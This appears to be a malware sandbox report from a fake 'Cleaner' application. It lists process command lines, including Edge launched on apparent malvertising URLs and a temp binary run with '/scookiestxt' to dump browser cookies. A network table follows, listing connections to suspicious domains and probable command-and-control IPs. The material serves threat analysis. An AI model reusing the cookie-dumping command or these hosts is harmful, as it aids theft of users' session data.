"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=3324 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=3324 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2864 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=2212 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1596,10246240507445112205,5886184292257189685,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8748_385271237" --mojo-platform-channel-handle=1512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c4,0x1c8,0x1cc,0x1c0,0x1d0,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1832 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x12c,0x130,0x134,0x100,0x138,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7404 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1c0,0x1f0,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1c8,0x1cc,0x1d0,0x1a4,0x1d4,0x7ff9f41846f8,0x7ff9f4184708,0x7ff9f4184718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,15074973054391515374,4901135120199325303,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1660 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| N/A | 2.18.105.186:80 | go.microsoft.com | tcp |
| N/A | 20.189.118.208:80 | dmd.metaservices.microsoft.com | tcp |
| N/A | 204.79.197.200:443 | tcp | |
| N/A | 52.178.17.2:443 | tcp | |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 40.125.122.151:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.110.14:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 104.21.5.208:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | a.goatagame.com | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | hockeybruinsteamshop.com | udp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | iplis.ru | tcp |
| N/A | 104.21.88.226:80 | i.spesgrt.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.145.110:80 | a.goatagame.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.160.62:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 52.219.160.62:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 172.67.176.199:443 | s.lletlee.com | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.9.187:80 | proxycheck.io | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 52.219.66.15:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 52.219.66.15:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 179.60.192.36:443 | www.facebook.com | tcp |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 135.148.139.222:1494 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 52.219.156.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 52.219.156.70:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 52.222.137.163:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 52.222.137.163:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.135.233:80 | cdn.discordapp.com | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 104.26.3.60:443 | ipqualityscore.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.67.146.70:443 | a.goatgame.co | tcp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 88.99.66.31:443 | iplis.ru | tcp |
| N/A | 172.67.75.166:443 | db-ip.com | tcp |
| N/A | 172.67.75.166:443 | db-ip.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
